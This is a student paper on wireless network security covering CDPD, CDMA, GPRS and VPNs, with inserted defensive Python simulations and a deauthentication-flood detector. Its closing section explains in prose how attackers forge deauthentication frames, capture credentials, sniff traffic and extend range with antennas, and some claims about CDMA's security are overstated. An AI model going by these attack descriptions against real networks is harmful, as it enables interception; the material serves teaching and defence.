Data Security in Wireless Networks (extended)

Date post: 09-Apr-2018
Upload: kamlekar-venkateshwar
8/7/2019 Data Security in Wireless Networks (extended)

1/26

1

ABSTRACT

Wireless Wide Area Networks (WAN) are a popular method of wirelessly accessing data over the Internet. A major concern for many corporate users of wireless WANs is data security and how to protect data that is transmitted over these wireless networks. There are many features of these wireless networks which provide user and data security. This paper discusses the security features for CDPD, CDMA, and GPRS networks, as well as an introduction to virtual private networks (VPN) and how these applications can be used to enhance the overall security of data on wireless networks.

For each of the technologies presented in this paper, a brief overview of the wireless network is given, followed by a discussion of each of the features of that network that contribute to the overall security of the network.

CONTENTS

Chapter No. / Topics / Page No.

1 Cellular Digital Packet Data (CDPD) / 5
    1.1 Introduction
    1.2 Operation of CDPD
    1.3 Features of CDPD
        1.3.1 Subscriber equipment security
        1.3.2 Authentication
        1.3.3 Airlink encryption
        1.3.4 Network security
        1.3.5 Private networks

2 CODE DIVISION MULTIPLE ACCESS (CDMA) / 8
    2.1 Introduction
    2.2 Spread spectrum
    2.3 Features of CDMA
        2.3.1 Lock Codes
        2.3.2 ESN and MIN numbers
        2.3.3 A-keys
        2.3.4 Authentication
        2.3.5 Authentication challenge
        2.3.6 Voice privacy
        2.3.7 Signaling Message Encryption
    2.4 Smart card technology

3 General Packet Radio Service (GPRS) / 12
    3.1 Introduction
    3.2 Operation of GPRS
    3.3 Features of GPRS
        3.3.1 Subscriber security
        3.3.2 Authentication
        3.3.3 Encryption
        3.3.4 Network security
        3.3.5 Additional encryption
        3.3.6 Private APN

4 Virtual Private Networks (VPN) / 15
    4.1 Introduction
    4.2 VPN overview
    4.3 Example of a VPN connection
    4.4 VPN vendors
    4.5 Strengths of a VPN

5 Data Security and wireless networks: mutually exclusive? / 18

5 Conclusion / 25

6 Bibliography / 26

1. CELLULAR DIGITAL PACKET DATA (CDPD)

1.1 INTRODUCTION: -

CDPD is a secure, proven, and reliable protocol that has been used for several years by law enforcement, public safety, and mobile professionals to securely access critical, private information. CDPD has several features to enhance the security of the mobile end user's data, and these are discussed below.

1.2 OPERATION OF CDPD: -

A brief overview of the operation of the CDPD network is as follows: A wireless modem (or Mobile End System, M-ES) communicates by radio with the Mobile Data Base Station (MDBS). The MDBS transfers this data by landline and microwave to the Mobile Data Intermediate System (MD-IS), which processes and sends the information, via Intermediate System gateways (routers), to the appropriate destination.

Figure: CDPD network structure

The modem refers to the wireless modem in the CDPD network. The MDBS is the cellular tower serving a specific geographical area. The MD-IS is a computer device that serves as the control point for CDPD in a specific region (usually covering several MDBSs).

1.3 FEATURES OF CDPD: -

1.3.1 Subscriber equipment security: -

Each modem on a CDPD network is identified by a unique Network Entity Identifier (NEI) assigned by the CDPD carrier, which gives the CDPD modem an Internet Protocol (IP) address visible to the rest of the Internet. Each modem device also has an Equipment Identifier (EID), which is a fixed number, unique to that modem. No two devices in CDPD can have the same EID. When a user signs up for service with a CDPD service provider, the user gives the EID to the service provider. This EID then becomes part of the Subscriber Directory Profile that the service provider maintains for each subscriber. A subscriber who replaces their modem with a newer one must report the new EID to the CDPD carrier. Until the carrier assigns this new EID to the subscriber's NEI, the new modem will not work on the CDPD network.

1.3.2 Authentication: -

In order to prevent piracy and cloning of CDPD devices, and thus fraudulent network use and billing, the CDPD standard provides sophisticated mechanisms for NEI authentication and verification. It can confirm that only the authorized modem, with the assigned NEI, is using that NEI.

Using the Diffie-Hellman Electronic Key Exchange mechanism, the authentication process uses three numbers: the NEI, the Authentication Sequence Number (ASN), and the Authentication Random Number (ARN), which together form the credentials of that modem. Although a subscriber can determine their NEI, they cannot obtain the ASN or ARN. When a subscriber's modem performs the authentication procedure during network registration, the MD-IS checks these credentials against the current values of the ASN and ARN. If the stored values do not match those provided by the modem, then the modem is not allowed to connect.

From time to time, the MD-IS generates a new (random) value for the ARN and then increments the ASN by one. The MD-IS delivers the new ARN to the modem in the final step of the encrypted registration process. The modem stores this ARN internally and increments its local ASN by one.
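The ASN/ARN rotation described above is what lets the MD-IS notice a cloned modem: a copy of the credentials goes stale the moment the legitimate modem registers and the ARN is replaced. The following simulation is an added example written for this page, not CDPD standard code or code from the paper. It models only the credential state machine; the Diffie-Hellman protected delivery of the new ARN is assumed to happen out of band, and the NEI label, the 32-bit ARN size and the class names are constructed for the example.

```python
"""Simulation of the CDPD NEI credential check (section 1.3.2).

Added example, not CDPD standard code. The MD-IS holds, per NEI, the
current Authentication Sequence Number (ASN) and Authentication Random
Number (ARN). A modem must present matching values to register; after a
successful registration the MD-IS issues a fresh random ARN and both
sides step the ASN. Delivery of the ARN is assumed to be protected by
the encrypted registration exchange and is not modelled here.
"""
import secrets
from dataclasses import dataclass, field


@dataclass
class Modem:
    """Subscriber modem: knows its NEI, its ASN and its current ARN."""
    nei: str
    asn: int
    arn: int


@dataclass
class MdIs:
    """Mobile Data Intermediate System: per-NEI credential registry."""
    registry: dict = field(default_factory=dict)  # nei -> (asn, arn)

    def provision(self, nei: str) -> Modem:
        """Carrier provisioning: assign initial ASN/ARN for a new NEI.
        ARN width of 32 bits is an assumption made for the example."""
        asn, arn = 0, secrets.randbits(32)
        self.registry[nei] = (asn, arn)
        return Modem(nei, asn, arn)

    def register(self, modem: Modem) -> bool:
        """Registration: accept only if (ASN, ARN) match the stored pair,
        then rotate the ARN and increment the ASN on both sides."""
        stored = self.registry.get(modem.nei)
        if stored is None or stored != (modem.asn, modem.arn):
            return False  # unknown NEI, stale ARN, or cloned credentials
        new_arn = secrets.randbits(32)
        self.registry[modem.nei] = (stored[0] + 1, new_arn)
        # Final step of the encrypted registration: deliver the new ARN.
        modem.arn = new_arn
        modem.asn += 1
        return True


def demo_clone_detection() -> dict:
    """Show that a clone holding a copy of the credentials is locked out
    once the legitimate modem has registered and rotated them."""
    mdis = MdIs()
    legit = mdis.provision("nei-0001")               # constructed NEI label
    clone = Modem(legit.nei, legit.asn, legit.arn)   # copied credentials
    first = mdis.register(legit)        # legitimate modem registers, ARN rotates
    clone_result = mdis.register(clone) # clone presents the stale ASN/ARN pair
    second = mdis.register(legit)       # legitimate modem still registers
    return {
        "legit_first": first,
        "clone": clone_result,
        "legit_second": second,
        "asn_after": mdis.registry[legit.nei][0],
    }


if __name__ == "__main__":
    print(demo_clone_detection())
```

Note the reverse case: if the clone registers first, the legitimate modem's next registration fails, and that failure is the signal a carrier uses to detect cloning and re-provision the subscriber.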

1.3.3 Airlink encryption: -

Because CDPD is a public wireless data communications service that could be susceptible to eavesdropping, all data (except broadcast messages) transferred between the modem and the MD-IS is encrypted by CDPD's Encryption Services. This encryption uses RSA algorithms and is managed by the Sub-network Dependent Convergence Protocol (SNDCP), which provides compression, encryption, and segmentation for data transferred over the network. It takes standard Internet packets, compresses their header information, segments them for transfer over the CDPD network, and encrypts the segments.

1.3.4 Network security: -

On a CDPD network, data is encrypted from the modem to the MD-IS. Beyond the MD-IS, data is generally not encrypted, much as general Internet traffic remains unencrypted unless the end user provides it. If necessary, the carrier or end user may encrypt data traveling over other portions of the network using other mechanisms.

1.3.5 Private networks: -

For CDPD customers requiring additional security, many service providers offer an additional service which restricts the Internet access of the user's NEIs to form a private network. This means that when data is sent from the modem to the MD-IS, the traffic is not then routed onto the public Internet, but is restricted to within the service provider's network and routed directly to the customer's host computer. This means that the data is never publicly available on the Internet, enhancing privacy and security even further.

2. CODE DIVISION MULTIPLE ACCESS (CDMA)

2.1 INTRODUCTION: -

CDMA is a recently patented technology but dates back to before World War II, when inventors patented a way of sending signals over different radio frequencies using random patterns to control torpedoes. The idea was later used to secure communications for the U.S. government during the Cuban Missile Crisis. The U.S. military declassified the technology in the 1980s, and it has now become CDMA cellular technology.

Spread-spectrum technology works by taking the conversations or data and attaching a code (known only to the sender and receiver) to it. The coded information is then split into packets and transmitted along with multiple other conversations or data packets over the network. The receiver then reassembles and decodes the data. This results in extremely secure transmissions, because the coded information is spread over the same bandwidth, resulting in trillions of possible combinations of coded messages.

2.2 Spread spectrum: -

CDMA is a spread spectrum technology, which means that the user data is assigned a unique code and then spread over a greater bandwidth than the original signal. The data bits of each call are then transmitted in combination with the data bits of all the other calls in the cell. At the receiving end, the digital codes are separated from the data, leaving only the original information that was sent.

Spread spectrum technology was traditionally used in military applications. It was secure enough for military applications because the signal is difficult to identify, jam, or interfere with, due to the wide bandwidth of a spread spectrum signal. A spread spectrum signal is very hard to detect, and appears as nothing more than a slight rise in the background noise. Other technologies have the signal power concentrated in a narrower band and are easier to detect.

CDMA phone calls are secure from casual eavesdroppers, since a radio receiver would not be able to pick individual digital conversations out of the overall RF radiation in a frequency band. Even if eavesdroppers intercepted a CDMA signal, it would be almost impossible to decipher.

2.3 Features of CDMA: -

2.3.1 Lock codes: -

A unique feature of CDMA handsets and modems is a unique code which acts as a network security lock. If your phone or modem is lost or stolen, it cannot be used on another CDMA network.

2.3.2 ESN and MIN numbers: -

Each mobile device on a CDMA network has a unique Electronic Serial Number (ESN) and Mobile Identification Number (MIN) associated with it. The network is able to compare the ESN/MIN combination each time a user connects to the network, and so increase security by not allowing cloned or unauthorized devices onto the network.

2.3.3 A-keys: -

An A-key is a secret 64-bit number used during authentication and encryption on the network. It is never revealed to the end user and is never transmitted over the air. The A-key is stored in the memory of the phone or modem and is only ever known to the mobile device and the Authentication Center on the network.

2.3.4 Authentication: -

Authentication of a mobile device on the network is initiated by the base station, which sends a 32-bit random number to the mobile device. The mobile device then uses a combination of the A-key, ESN, MIN, and the random number to compute an authentication signature, which is returned to the base station. The A-key values are also stored on the network in the Authentication Center (AC), so the base station can also calculate the authentication signature. Upon receipt of a Registration message, phone call or data transmission, the network compares the authentication signature sent by the mobile device to the one that is stored on the network. If the two match, the mobile device is allowed onto the network.

2.3.5 Authentication challenge: -

The authentication challenge is another mechanism that the base station can use to authenticate the mobile device at any time. The base station sends an authentication challenge to the mobile device, which then calculates its authentication signature and sends it to the base station that issued the authentication challenge. The base station compares the authentication signature received from the mobile to the one stored in the Authentication Center to determine the mobile device's validity on the network.
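Sections 2.3.3 to 2.3.5 describe one protocol shape: a shared secret (the A-key) that never crosses the air, a fresh random challenge from the network, and a signature over ESN, MIN and the challenge that both sides can compute. The block below is an added example written for this page, not CDMA network code or code from the paper. The real CDMA signature algorithm (CAVE) is replaced by HMAC-SHA256 as a stated assumption, and the ESN/MIN values and class names are constructed; what it demonstrates is why a cloned ESN/MIN without the A-key fails, and why a captured signature cannot be replayed against a new challenge.

```python
"""Challenge-response authentication in the style of CDMA (2.3.3-2.3.5).

Added example, not CDMA network code. The A-key stays inside the device
and the Authentication Center (AC); only a 32-bit random challenge and
the resulting signature are exchanged. HMAC-SHA256 stands in for the
CAVE algorithm (assumption); the protocol shape is the point.
"""
import hashlib
import hmac
import secrets


def auth_signature(a_key: bytes, esn: str, min_: str, rand: int) -> bytes:
    """Signature over ESN, MIN and the challenge, keyed by the A-key.
    HMAC-SHA256 is an assumption standing in for CAVE."""
    msg = f"{esn}|{min_}|{rand:08x}".encode()
    return hmac.new(a_key, msg, hashlib.sha256).digest()


class AuthenticationCenter:
    """Holds A-keys per (ESN, MIN), issues challenges, verifies signatures."""

    def __init__(self) -> None:
        self.a_keys: dict = {}       # (esn, min) -> 64-bit A-key
        self.outstanding: dict = {}  # (esn, min) -> live challenge

    def enroll(self, esn: str, min_: str) -> bytes:
        """Provision a 64-bit A-key; it is returned only so the example can
        load it into the device, it is never sent over the air."""
        a_key = secrets.token_bytes(8)
        self.a_keys[(esn, min_)] = a_key
        return a_key

    def challenge(self, esn: str, min_: str) -> int:
        """Base station side: issue a fresh 32-bit random number."""
        rand = secrets.randbits(32)
        self.outstanding[(esn, min_)] = rand
        return rand

    def verify(self, esn: str, min_: str, signature: bytes) -> bool:
        """Compare the device's signature with the AC's own computation.
        The challenge is consumed on use, so a replayed signature fails."""
        key = self.a_keys.get((esn, min_))
        rand = self.outstanding.pop((esn, min_), None)
        if key is None or rand is None:
            return False  # unknown device, or no live challenge (replay)
        expected = auth_signature(key, esn, min_, rand)
        return hmac.compare_digest(expected, signature)


class MobileDevice:
    """Handset or modem holding ESN, MIN and its A-key."""

    def __init__(self, esn: str, min_: str, a_key: bytes) -> None:
        self.esn, self.min, self.a_key = esn, min_, a_key

    def respond(self, rand: int) -> bytes:
        return auth_signature(self.a_key, self.esn, self.min, rand)


def run_scenarios() -> dict:
    """Legitimate device, clone without the A-key, and a replayed signature."""
    ac = AuthenticationCenter()
    esn, min_ = "ESN-CONSTRUCTED-1", "MIN-5550100"  # constructed identifiers
    phone = MobileDevice(esn, min_, ac.enroll(esn, min_))

    legit = ac.verify(esn, min_, phone.respond(ac.challenge(esn, min_)))

    clone = MobileDevice(esn, min_, b"\x00" * 8)    # has ESN/MIN, guesses the A-key
    cloned = ac.verify(esn, min_, clone.respond(ac.challenge(esn, min_)))

    sig = phone.respond(ac.challenge(esn, min_))
    first = ac.verify(esn, min_, sig)
    replay = ac.verify(esn, min_, sig)               # same signature, no live challenge
    return {"legit": legit, "clone": cloned, "first": first, "replay": replay}


if __name__ == "__main__":
    print(run_scenarios())
```

Consuming the challenge on verification is the detail that makes the "authentication challenge at any time" of section 2.3.5 safe to repeat: every challenge is single-use, so an eavesdropper who records a valid signature gains nothing.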

2.3.6 Voice privacy: -

On a CDMA network, voice privacy is provided on both the forward and reverse channels by a pseudo-random sequence of bits known to the mobile device and base station. Voice privacy makes it difficult to listen to the channel, and so it protects not only voice traffic, but any data or signaling information that is transmitted as well.

2.3.7 Signaling Message Encryption: -

Signaling Message Encryption is similar to voice privacy in that it encrypts the signaling messages sent over the network. This encryption uses a key generated by the mobile and the base station during call setup.

2.4 Smart card technology: -

A recent development is that CDMA technology now allows for the use of smart cards on CDMA-based networks. The R-UIM (Removable User Identity Module) is similar to the SIM (Subscriber Identity Module) cards used on GSM and GPRS networks.

Advantages of an R-UIM include:

    Easier replacement and exchange of handsets or mobile devices
    The ability to move user profiles and personal data between devices
    Secure network connection
    Potential for cross-standard roaming capabilities

3 GENERAL PACKET RADIO SERVICE (GPRS)

3.1 Introduction: -

GPRS is based on GSM technology, the most widely used global wireless technology. The security architecture is therefore a solid, proven technology. GPRS networks have many security features that ensure protection of user identities, subscriber equipment, and user data.

3.2 Operation of GPRS: -

A brief overview of the operation of the GPRS network is as follows: A wireless modem (or Mobile Station, MS) communicates via a radio link with the Base Transceiver Subsystem (BTS). The BTS transfers this data to a Base Station Controller (BSC), which separates voice and data traffic. Data is then transferred to the Serving GPRS Support Node (SGSN), which authenticates the MS, and then on to the Gateway GPRS Support Node (GGSN), which acts as the gateway to external networks (such as the Internet or the service provider's network). The data is then sent, via routers, to the appropriate destination.

3.3 Features of GPRS: -

3.3.1 Subscriber security: -

One of the security features on GPRS networks is the Subscriber Identity Module (SIM) card. This is a small electronic card that fits into the Mobile Station (MS) phone or data device. All of the user's network account information is contained on this SIM card (as well as data such as personal phone book entries). Without a valid SIM card in the MS, it is not possible for the device to access the GSM/GPRS network. The SIM card can also be locked with a user-defined password (Personal Identification Number or PIN) for additional security.

3.3.2 Authentication: -

The SGSN controls the ciphering (encryption) and authentication of the MS. GPRS authentication and ciphering are similar to those of GSM networks, with a few modifications. When the GPRS subscriber first connects to the network, the SGSN authenticates the MS using data contained in the SIM card. It compares this information with the authentication data from a database on the network, known as the Home Location Register (HLR). During this authentication process, a non-predictable random number is used to generate an authentication key, further enhancing security. Although used in the authentication process, this authentication key is never transmitted over any part of the network.

3.3.3 Encryption: -

All data transferred between the MS and the SGSN is encrypted on GPRS networks. During the authentication process, it can also be decided whether ciphering (encryption) is to be used. Encryption is then established by the generation of an encryption key. All data communication between the MS and SGSN is encrypted using the GPRS Encryption Algorithm (GEA), a version of the A5 algorithm used on GSM networks.

3.3.4 Network security: -

The point where the service provider's GPRS network connects to the Internet is the GGSN. At this point, GPRS networks have a GGSN firewall that allows user data to pass outside of the GPRS network, while at the same time blocking attempts to connect to the MS from the outside. The GGSN firewall protects the MS from attacks coming from outside the GPRS network, while the SGSN protects the user against other MSs. Network address translation is also done by the GGSN, thus hiding the private IP addresses of the MS from users outside of the GPRS network.
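The two GGSN behaviours just described, an outbound-only firewall and address translation, are the same mechanism: a flow table keyed by the MS-initiated connection. The block below is an added example written for this page, not code from any GPRS product or from the paper. It assumes a single public address with port-based NAT, a fixed private prefix for MS addresses, and uses constructed addresses from the documentation ranges 10.0.0.0/8, 198.51.100.0/24 and 203.0.113.0/24.

```python
"""Stateful GGSN-style filter with NAT (section 3.3.4).

Added example, not code from any GPRS product. Flows that an MS opens
toward the Internet create state; inbound packets are forwarded only
when they match such a flow, so unsolicited connection attempts to an MS
are dropped. The MS's private address is rewritten to one public address
(assumption: single public IP, port-based NAT).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    direction: str  # "out" = MS toward Internet, "in" = Internet toward MS


class GgsnFilter:
    def __init__(self, public_ip: str = "198.51.100.1", ms_prefix: str = "10.0.") -> None:
        self.public_ip = public_ip      # constructed public NAT address
        self.ms_prefix = ms_prefix      # constructed private MS range
        self.nat: dict = {}             # public_port -> (ms_ip, ms_port)
        self.flows: set = set()         # (public_port, remote_ip, remote_port)
        self._next_port = 40000

    def process(self, pkt: Packet):
        """Return the packet as forwarded (translated), or None if dropped."""
        if pkt.direction == "out":
            if not pkt.src_ip.startswith(self.ms_prefix):
                return None  # source is not an MS address: drop spoofed traffic
            pub_port = self._port_for(pkt.src_ip, pkt.src_port)
            self.flows.add((pub_port, pkt.dst_ip, pkt.dst_port))
            return Packet(self.public_ip, pub_port, pkt.dst_ip, pkt.dst_port, "out")
        # Inbound: accept only replies to a flow the MS opened itself.
        key = (pkt.dst_port, pkt.src_ip, pkt.src_port)
        if pkt.dst_ip != self.public_ip or key not in self.flows:
            return None  # no MS-initiated flow: unsolicited, drop
        ms_ip, ms_port = self.nat[pkt.dst_port]
        return Packet(pkt.src_ip, pkt.src_port, ms_ip, ms_port, "in")

    def _port_for(self, ms_ip: str, ms_port: int) -> int:
        """Reuse an existing NAT binding or allocate a new public port."""
        for pub, binding in self.nat.items():
            if binding == (ms_ip, ms_port):
                return pub
        pub = self._next_port
        self._next_port += 1
        self.nat[pub] = (ms_ip, ms_port)
        return pub


def run_sample() -> dict:
    """Constructed traffic: an MS opens a web connection, the reply returns,
    then two unsolicited inbound attempts and one spoofed outbound packet."""
    ggsn = GgsnFilter()
    outbound = ggsn.process(Packet("10.0.0.7", 51000, "203.0.113.10", 80, "out"))
    reply = ggsn.process(Packet("203.0.113.10", 80, outbound.src_ip, outbound.src_port, "in"))
    probe_public = ggsn.process(Packet("203.0.113.99", 4444, ggsn.public_ip, 40000, "in"))
    probe_private = ggsn.process(Packet("203.0.113.99", 4444, "10.0.0.7", 51000, "in"))
    spoofed = ggsn.process(Packet("192.0.2.5", 1, "203.0.113.10", 80, "out"))
    return {"outbound": outbound, "reply": reply, "probe_public": probe_public,
            "probe_private": probe_private, "spoofed": spoofed}


if __name__ == "__main__":
    for name, pkt in run_sample().items():
        print(f"{name}: {pkt}")
```

The external host only ever sees 198.51.100.1:40000, never 10.0.0.7, which is the address-hiding property the section attributes to the GGSN; the same table that performs the translation is what rejects the two probes.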

3.3.5 Additional encryption: -

Data is generally not encrypted beyond the GGSN, much as general Internet traffic remains unencrypted unless the end user provides it. If necessary, the carrier or end user may encrypt data traveling over other portions of the network using other mechanisms. An example is to create a VPN between the GGSN and the corporate intranet being accessed. The traffic is encrypted at a VPN server and is transported in encrypted form over the Internet to access the corporate intranet. Another option would be a dedicated connection or leased line from the GGSN to the corporate intranet, which would provide additional security and constant bandwidth, completely bypassing the Internet.

3.3.6 Private APN: -

Many GPRS service providers offer a separate Access Point Name (APN) for secure access. A standard APN will not encrypt traffic beyond the GGSN, whereas a private APN will encrypt the traffic, using one of the methods described above, depending on the configuration of the network.

4 VIRTUAL PRIVATE NETWORKS (VPN)

4.1 INTRODUCTION: -

Even though each of the wireless networks discussed provides a high level of security to prevent eavesdropping or interception of data, many users require an end-to-end security solution. This would protect data integrity at all points from the mobile user's computer to the host network. For customers wanting additional security, an end-to-end VPN connection provides the best security. Traffic is encrypted at the VPN client on the mobile device and is decrypted at the corporate VPN server. Thus, all traffic is encrypted as it travels through the whole connection. Authentication is also in the hands of the subscriber's organization.

4.2 VPN overview: -

An IP-based VPN (that is, not a frame relay or leased line VPN) allows you to temporarily create or join a private network across an existing public network by creating an encrypted tunnel between two hosts. This tunnel allows you to securely transfer information and access remote resources. A VPN has the benefit of being a secure method of transmitting data while still being cost effective.

4.3 Example of a VPN connection: -

To connect to a corporate network, a user connects to their wireless service provider's network as usual. The user then starts software on their mobile device which requests a VPN tunnel to the VPN server on the corporate network. The VPN server authenticates the user and creates the secure VPN tunnel. The VPN software encrypts any data that the user sends over the wireless connection, and the VPN server then decrypts the data and forwards it to the corporate network. The VPN server encrypts data sent to the remote user before it is sent over the wireless network, and the VPN software on the user's computer then decrypts it. Without a VPN connection, the connection is only protected on the wireless network, and may not be secured over the Internet.

Figure: Without a VPN

With a VPN connection, traffic is encrypted (or tunneled) over the whole connection from the mobile user's computer to the host network.

Figure: With a VPN tunnel

4.4 VPN vendors: -

There are a number of companies that offer a variety of VPN solutions. Checkpoint, Cisco, Nortel, Intel, and Microsoft are all companies that provide popular VPN solutions. Companies like Certicom and NetMotion Wireless provide solutions that are optimized for wireless connections and mobile users.

4.5 Strengths of a VPN: -

A VPN is able to offer secure access to data and provides different levels of security that include tunneling, encryption, authentication, and authorization. VPNs allow remote users seamless, low-cost access to corporate networks, all over a secure connection. VPNs have lower hardware, software, and network costs, which reduce the total cost of a secure network. Operating costs are also lower, since there are no leased lines or long-distance telephone charges for remote access. VPN infrastructure is easily adapted and expanded as an organization, and its networking requirements, grow. VPNs that utilize the Internet avoid increasing infrastructure costs by using existing infrastructure. Because VPNs are standards-based, users can access a variety of applications or services, and entire networks can be easily integrated with one another. A VPN is more flexible than a fixed network and can be reconfigured by changing software parameters, without changing the physical network.

5. Data Security and wireless networks: mutually exclusive?

5.1 Introduction

There have been numerous papers discussing the use of mobile devices, such as personal data assistant (PDA) type devices, and a few which discuss the use of wireless networks in a medical environment. While some of these papers discussed security, the pace at which the technology has advanced has meant that the information provided in these works is no longer current. For example, it is no longer relevant to discuss wired equivalent privacy (WEP), the initial security measure used by wireless networks, as it has been repeatedly shown to be fatally flawed. Although there have been further advances in wireless security, so too has there been an increase in the knowledge of the wireless network protocols and, more importantly, any flaws they may contain. Whilst data security is important for any user, it is obviously of paramount importance in a medical environment. The use of mobile devices to provide access to patient records at the point of clinical care is being trialled worldwide and is providing both access to medical records and clinical decision support.

There are two aspects of wireless networks which lead to their insecurity. The first aspect is that they use a broadcast medium. The information is effectively broadcast and propagated over a wide area (up to 150m), with any suitably equipped entity within the signal locus capable of capturing or modifying this information. The second is the embedded vulnerabilities in the modus operandi of the 802.11 protocol. The inability to verify 802.11 management and control frames is one such vulnerability, leaving the network susceptible to attacks such as denial of service (DoS) and man-in-the-middle (MITM) attacks.

5.2 The vulnerabilities with wireless networks

The risks with using wireless networks can be broadly categorised into four categories: denial of service, eavesdropping, protocol vulnerabilities and rogue access points (AP).

5.2.1 Denial of service

This type of attack can be perpetrated in one of two ways. It can either be conducted through the use of a jamming technique, or by exploiting the OSI Layer Two vulnerabilities that exist within the 802.11 protocol suite. The first type of attack, that of jamming, is fairly easy to perpetrate, and is reasonably difficult to detect. A jamming attack can be either intentional or unintentional. An intentional attack is one in which the attacker broadcasts a very high-power signal at the same frequency that the wireless network is operating on, causing interference to the network. The likelihood of this type of attack being conducted is fairly low as there is no real benefit to an attacker, unless it is to force a client to roam to a rogue AP. This type of attack may also occur unintentionally, through the placement of a device which operates at the same frequency in the vicinity of the wireless network. For devices that operate in the 2.4GHz frequencies, this includes microwave ovens, some cordless phones, baby monitors and Bluetooth devices. Bluetooth devices are known to interfere with the operation of wireless networks.

The second category of attack, the so-called layer 2 attacks, exploits the lack of verification of control frames in the wireless network. This control and management information is broadcast in clear text by wireless networks, and can be captured by an attacker using a freely available packet capture tool, such as Kismet. Once gathered, this information can then be used against the wireless network that it was captured from, and used to force a client to leave and rejoin a network by issuing false disassociation or deauthentication frames.

During the reassociation process, the user's logon and authentication details can be captured by the attacker. This information can then be used to further exploit the wireless network. This type of attack can also be used to launch a man in the middle attack against the wireless network, and can even be used to circumvent virtual private network (VPN) systems. These layer 2 attacks are probably one of the most concerning to IS managers, as there appears to be no adequate means to prevent them from occurring.
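Because the forged disassociation and deauthentication frames described above cannot be verified, the practical control is to notice them: a legitimate AP emits such frames rarely, so a burst of them from one source address is a strong signal. The following detector is an added example written for this page, not code from the paper or from any wireless IDS. It assumes a constructed one-line-per-frame log in the format "epoch_seconds subtype source_mac dest_mac", as produced by a monitor-mode capture that has already been parsed; the MAC addresses, timestamps, window and threshold are constructed for the example.

```python
"""Detect a layer 2 disassociation/deauthentication flood (section 5.2.1).

Added example, not from the paper or any IDS product. Input is a
constructed log of 802.11 management frames, one per line, in an assumed
format: "<epoch_seconds> <subtype> <source_mac> <dest_mac>". A source
that emits more than THRESHOLD deauth/disassoc frames within WINDOW
seconds is reported once per window.
"""
from collections import defaultdict, deque

WINDOW = 10.0       # seconds, assumption for the example
THRESHOLD = 5       # frames per window, assumption for the example
FLOOD_SUBTYPES = {"deauth", "disassoc"}


def parse_frame(line: str):
    """Parse one log line into (timestamp, subtype, src, dst)."""
    ts, subtype, src, dst = line.split()
    return float(ts), subtype, src.lower(), dst.lower()


def detect_floods(lines, window: float = WINDOW, threshold: int = THRESHOLD):
    """Sliding window per source MAC. Returns a list of (source, count, ts)
    alerts; at most one alert per source per window avoids alert storms."""
    recent = defaultdict(deque)   # src -> timestamps of recent flood-type frames
    alerted_at = {}               # src -> timestamp of last alert
    alerts = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, subtype, src, _dst = parse_frame(line)
        if subtype not in FLOOD_SUBTYPES:
            continue
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()               # drop frames older than the window
        if len(q) > threshold and ts - alerted_at.get(src, float("-inf")) > window:
            alerted_at[src] = ts
            alerts.append((src, len(q), ts))
    return alerts


# Constructed sample: the AP's own address sends one legitimate deauth,
# then the same address (spoofed by an attacker) floods a client.
SAMPLE_LOG = """
# ts subtype src dst
1000.0 beacon   aa:bb:cc:00:00:01 ff:ff:ff:ff:ff:ff
1001.5 deauth   aa:bb:cc:00:00:01 11:22:33:44:55:66
1050.0 beacon   aa:bb:cc:00:00:01 ff:ff:ff:ff:ff:ff
1100.0 deauth   aa:bb:cc:00:00:01 11:22:33:44:55:66
1100.2 deauth   aa:bb:cc:00:00:01 11:22:33:44:55:66
1100.4 disassoc aa:bb:cc:00:00:01 11:22:33:44:55:66
1100.6 deauth   aa:bb:cc:00:00:01 11:22:33:44:55:66
1100.8 deauth   aa:bb:cc:00:00:01 11:22:33:44:55:66
1101.0 deauth   aa:bb:cc:00:00:01 11:22:33:44:55:66
1101.2 deauth   aa:bb:cc:00:00:01 11:22:33:44:55:66
1120.0 beacon   aa:bb:cc:00:00:01 ff:ff:ff:ff:ff:ff
""".strip().splitlines()

QUIET_LOG = """
1000.0 beacon aa:bb:cc:00:00:01 ff:ff:ff:ff:ff:ff
1001.5 deauth aa:bb:cc:00:00:01 11:22:33:44:55:66
1200.0 deauth aa:bb:cc:00:00:01 11:22:33:44:55:66
""".strip().splitlines()


if __name__ == "__main__":
    for src, count, ts in detect_floods(SAMPLE_LOG):
        print(f"ALERT t={ts}: {count} deauth/disassoc frames from {src} within {WINDOW}s")
```

The single early deauth at t=1001.5 ages out of the window before the burst, so only the burst raises an alert, and the seventh flood frame does not raise a second one. The source address in the alert is the AP's own, which is expected: the attacker forges the AP address, so the value of the alert is the rate, not the sender.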

5.3 Eavesdropping

The functionality of a wireless network presents one of its biggest problems. Because wireless is a broadcast medium, there is no way to control where the information is sent and who therefore has access to it. By modifying the drivers used with the wireless client devices, many individuals and organisations have developed analysis tools, known as sniffers. There are both freeware (Kismet) and commercial (Airopeek) versions of this type of software. When used within the broadcast range of a wireless network, these can be used to capture every packet travelling over the wireless network. If an access point is set up and used in its default configuration, then the user of such a system is vulnerable to attack, because anyone running sniffer software can see and capture everything that a user does across that network. This includes data (medical records), passwords and email messages. Even when encryption is used, there is still important information which is available to anyone within range of a wireless network. This includes the network name (SSID), the MAC addresses of both AP and clients, and a range of other information.

Another problem with the broadcast medium is that the range is not only dictated by the transmitter, but also by the receiver. The effective range of the wireless network is the intersection of where the two antenna coverage patterns overlap. An attacker can increase the distance at which they can perform an attack simply by using a larger antenna. Depending on the antenna type used, the range is only limited by the ability to obtain line of sight between attacker and victim.

5.4 Protocol Vulnerabilities

This category examines the flaws or exploits that exist in wireless networks due to vulnerabilities with the protocol itself, and with its implementation in various operating systems. The 802.11i security extension was developed by the IEEE to provide increased security through stronger authentication and encryption. This was done through the use of port based access control (802.1x) and the extensible authentication protocol (EAP) for authentication, and the use of the advanced encryption standard (AES) for data encryption. The initial measures found in the draft version of 802.11i were released under the banner of Wi-Fi protected access (WPA), with the final measures called WPA2. Whilst the measures included in the 802.11i extension have increased security, there have been a number of areas identified which are of some concern. These include: the implementation of the temporal key integrity protocol (TKIP) in WPA, problems with 802.1x authentication, and EAP weaknesses. Further, it appears that no attempts have been made to address the problem with Layer 2 vulnerabilities that exist in the 802.11 protocol. This flaw in the protocol has potentially serious consequences for wireless systems when used in certain environments.

5.4.1 802.1x protocol weaknesses

